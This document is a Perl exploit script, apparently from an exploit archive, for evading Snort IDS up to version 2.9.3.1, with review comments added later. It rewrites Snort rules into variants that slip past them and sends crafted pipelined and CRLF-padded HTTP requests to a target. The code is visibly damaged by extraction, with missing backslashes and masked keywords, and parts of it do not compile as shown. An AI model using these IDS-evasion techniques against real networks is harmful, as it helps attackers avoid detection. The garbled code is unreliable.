
Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit Unknown rwxr-xr-x 0 8:07 AM

Filename Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit
Permission rw-r--r--
Author Unknown
Date and Time 8:07 AM
#!/usr/bin/perl
use IO::Socket;

# Number of rules flagged during a rule audit; incremented by analizerules()
# and reported by checkrules().
my $bypasscount = 0;

# Exactly one argument is expected: a URL, or a path to Snort rules.
unless ($ARGV[0]) {
    die("Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n");
}

# An argument that names an existing file or directory selects the offline
# rule audit; anything else is handed to tests() and parsed there as a URL.
if (-f $ARGV[0] || -d $ARGV[0]) {
    print "[-] Analyzing Rules...\n\n";
    checkrules($ARGV[0]);
}
else {
    tests();
}

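# Print a hex/ASCII dump of a byte string to the currently selected output
# handle, one row per 16 bytes:
#   0xOFFSET (DECIMAL)   <hex columns>   <text with non-printables as ".">
#   $_[0] - the bytes to dump (undef is treated as an empty string).
# Returns nothing.
sub hdump {
    my ($bytes) = @_;
    $bytes = '' unless defined $bytes;
    my $offset = 0;

    # Full 16-byte rows first, then whatever is left over ("a*").
    my $template = ("a16" x int(length($bytes) / 16)) . "a*";

    foreach my $row (unpack($template, $bytes)) {
        my $len = length($row);

        # "a*" yields an empty string when the input length is a multiple of
        # 16 (or the input is empty); printing it would add a blank row.
        next if $len == 0;

        my (@cells, $format);
        if ($len == 16) {
            # A full row is shown as four big-endian 32-bit words.
            @cells  = unpack('N4', $row);
            $format = "0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
        }
        else {
            # A short row is shown byte by byte and padded to 16 columns so
            # the text column stays aligned with the full rows.
            @cells = map { sprintf "%2.2x", $_ } unpack('C*', $row);
            push @cells, ('  ') x (16 - $len);
            $format = "0x%08x (%05d)"
                    . "   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";
        }

        # Control bytes and bytes >= 0x7f are shown as "." in the text column.
        # The listing shows this range without backslashes ("0-37177-377"),
        # which is an invalid range and does not compile; the octal escapes
        # are restored here.
        (my $text = $row) =~ tr/\0-\37\177-\377/./;

        printf($format, $offset, $offset, @cells, $text);
        $offset += 16;
    }
    return;
}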

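# Decode Snort's pipe-delimited hex notation inside a rule match string,
# e.g. "a|3F 41|b" becomes "a?Ab". Text outside |...| sections, and sections
# that are not pairs of hex digits, are returned unchanged.
#   $_[0] - match string taken from a rule.
# Returns the decoded string (undef is passed through).
sub snorthexdecode {
    my ($encoded) = @_;
    return $encoded unless defined $encoded;

    # NOTE(review): the listing shows the pattern without its backslashes
    # ("/|((s*([dw]{2})s*)+)|/"); in that form the empty alternative always
    # matches and the original while-loop never ends. The pipes and \s are
    # restored here and the byte pairs are limited to real hex digits.
    # One substitution pass is used so a decoded "|" byte is never re-read
    # as the start of another hex section.
    $encoded =~ s{
        \|
        ( (?: \s* [0-9A-Fa-f]{2} \s* )+ )
        \|
    }{
        join('', map { chr(hex($_)) } ($1 =~ /([0-9A-Fa-f]{2})/g))
    }gex;

    return $encoded;
}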
# Walk a Snort rule file (or, recursively, a directory of rule files), print
# every rule the patterns below flag, and add one to the file-level
# $bypasscount per flagged rule.
#   $_[0] - path to a rule file or a directory.
# NOTE(review): several patterns in this listing look damaged by extraction:
# backslashes are missing and a keyword is masked as "*******" (presumably
# Snort's "content" option -- confirm against the original script). As shown
# the sub does not compile, so the comments below describe the apparent
# intent rather than verified behaviour.
sub analizerules {
my $pathrules=$_[0];
if(-f $pathrules){
# NOTE(review): two-argument open on a caller-supplied path, with a bareword
# handle and no error check. A three-argument open on a lexical handle with
# "or die" avoids mode injection through the file name and silent failures.
# RULE is also never closed.
open RULE,$pathrules;
while(<RULE>) {
my $rule=$_;
# Presumably meant to strip trailing CR/LF ("[\r\n]+$"); as shown it strips
# trailing letters "r" and "n" instead.
$rule=~s/[rn]+$//g;
# Case 1: the rule uses the http_uri modifier and has a quoted match string.
if($rule=~/http_uri;/ && $rule=~/*******:s*"([^"]+)"/i){
# The decoded match string is flagged when it appears to span a file name
# with a short extension, a query delimiter (a literal "?" or its |3F| hex
# form) and the text after it -- i.e. the signature pins the exact bytes
# that follow the "?".
# Rule-writing note: a signature written this way is sensitive to parameter
# order; presumably matching the path and the parameter as separate options
# removes that dependency -- verify against the sensor's documentation.
if(snorthexdecode($1)=~/([^"]*.w{1,4})(|3F||?)([^"]+)/){
# The reported variant puts an extra parameter between path and query.
my $bypass=$1."?junk&".$3;
# The bare "n" characters in this message look like newlines that lost their
# backslash (compare the header branch below).
print "[!] Vuln rule ".$pathrules.": ".$rule."n[!] URI Bypass: ".$bypass."nn";
$bypasscount++;
}
# Case 2: the rule uses the http_header modifier and has a quoted match string.
} elsif($rule=~/http_header;/ && $rule=~/*******:"([^"]+)"/){
# The decoded match string is flagged when it looks like "Name: value" with
# exactly one space after the colon ("[^:s]" is presumably "[^:\s]").
# Rule-writing note: a signature that requires one literal space does not
# cover other whitespace a server may accept after the colon; matching the
# name and value separately, or relying on header normalization, is the
# usual remedy -- TODO confirm for the deployed Snort version.
if(snorthexdecode($1)=~/^([^:s]+:) (.+)$/){
# The reported variant uses a tab in place of the space.
my $bypass=$1."\t".$2;
print "[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
$bypasscount++;
}
}
}
} elsif(-d $pathrules) {
# NOTE(review): opendir is unchecked and DIR is a bareword (package-global)
# handle. The recursive call below reopens the same DIR handle for a
# subdirectory, which disturbs the listing still in progress here; a lexical
# handle per call avoids that. DIR is never closed.
opendir (DIR, $pathrules);
# A bare readdir in a while condition assigns to $_ only on Perl 5.12 and later.
while(readdir DIR) {
# Presumably meant to skip "." and ".." ("^\.+$"); as shown, "^.+$" matches
# every non-empty name, so no entry would be visited.
analizerules($pathrules."/".$_) if($_ !~/^.+$/);
}
}
}
# Run the rule audit on the file or directory given as the first argument,
# then print the number of rules that analizerules() flagged.
sub checkrules {
    my ($rules_location) = @_;
    analizerules($rules_location);
    print "[-] Bypassed rules: $bypasscount\n";
}
# Parse the URL in $ARGV[0] into host, port and path, build two raw HTTP
# request streams for that path, send each one over its own TCP connection,
# and hex-dump both the bytes sent and the bytes received via hdump().
# Takes no arguments; dies on an unparsable URL, a missing path or a failed
# connection.
# NOTE(review): several patterns in this listing look damaged by extraction
# (unescaped "/" inside "/.../" patterns, "d+" for "\d+"), and the header
# names shown as "*******-Type" / "*******-Length" appear to be masked
# (presumably "Content-" -- confirm against the original). As shown the sub
# does not compile, so these comments describe the apparent intent.
# Detection note: per the page title this concerns Snort up to 2.9.3.1.
# Both streams built below are unusual on the wire -- bare line feeds before
# a request line, and long CRLF runs between pipelined requests on one
# connection -- which presumably makes them visible to HTTP normalization
# or protocol-anomaly alerts; verify on the sensor in use.
sub tests {
my $host="";
my $port=80;
my $path="";
# Split "http://host[:port]/path"; only the http scheme is recognised.
if($ARGV[0]=~/^http://([^/]+)(.*)$/){
$host=$1;
$path=$2;
if($host=~/^([^:]+):(d+)$/){
$host=$1;
$port=$2;
}
}
# An empty host (URL did not match above) or one still containing ":" is rejected.
if($host!~/^[^:]+$/){
die('Invalid URL!');
}
print "[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
# Requires at least one character after the leading "/".
if($path !~ "/(.+)"){
die('I need a path...');
# NOTE(review): unreachable -- die() above never returns.
$path=$1;
}
# Percent-encode every character of the path except "/".
# NOTE(review): $encodedpath is printed but not used in any request below;
# it, @orders, @packets, $i and $packet are package globals (no "my").
$encodedpath=$path;
$encodedpath=~s/([^/])/"%" . uc(sprintf("%2.2x",ord($1)))/eg;
print "[-] Encoded path: ".$encodedpath."\n";
# Labels printed per test. Five are defined but only two requests are built,
# so the last three are never used.
@orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
# Prefix for the second test: two keep-alive POST requests to "/", each
# followed by twelve CRLFs, then ten bytes of body text.
my $payload="POST / HTTP/1.1\r\n".
"*******-Type: application/x-www-form-urlencoded\r\n".
"*******-Length: 0\r\n".
"Connection: Keep-Alive\r\n".
"Host: ".$host.("\r\n"x12).
"POST / HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"Connection: Keep-Alive\r\n".
"*******-Type: application/x-www-form-urlencoded\r\n".
"*******-Length: 30".("\r\n"x12).
"1234567890";

# Test 1: a HEAD request for the path, preceded by four bare line feeds.
# Test 2: the same HEAD request appended to the POST prefix above.
@packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
$packets[1]=$payload.$packets[0];

$i=0;
foreach $packet (@packets){
# NOTE(review): indirect object syntax; IO::Socket::INET->new(...) is the
# unambiguous form. No timeout is set, so the read loop below waits until
# the peer closes the connection.
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Reuse => 1,
);
die "Could not create socket: $!\n" unless $sock;
print "[-] Seding ".$orders[$i]." test...\n";
# Show exactly what is about to be written to the socket.
hdump($packet);
print $sock $packet;
print "\n[+] Headers:\n";
# Read the whole response until EOF, then dump it.
my $todo="";
while(<$sock>){
$todo.=$_;
}
close($sock);
hdump($todo);
$i++;
}
}
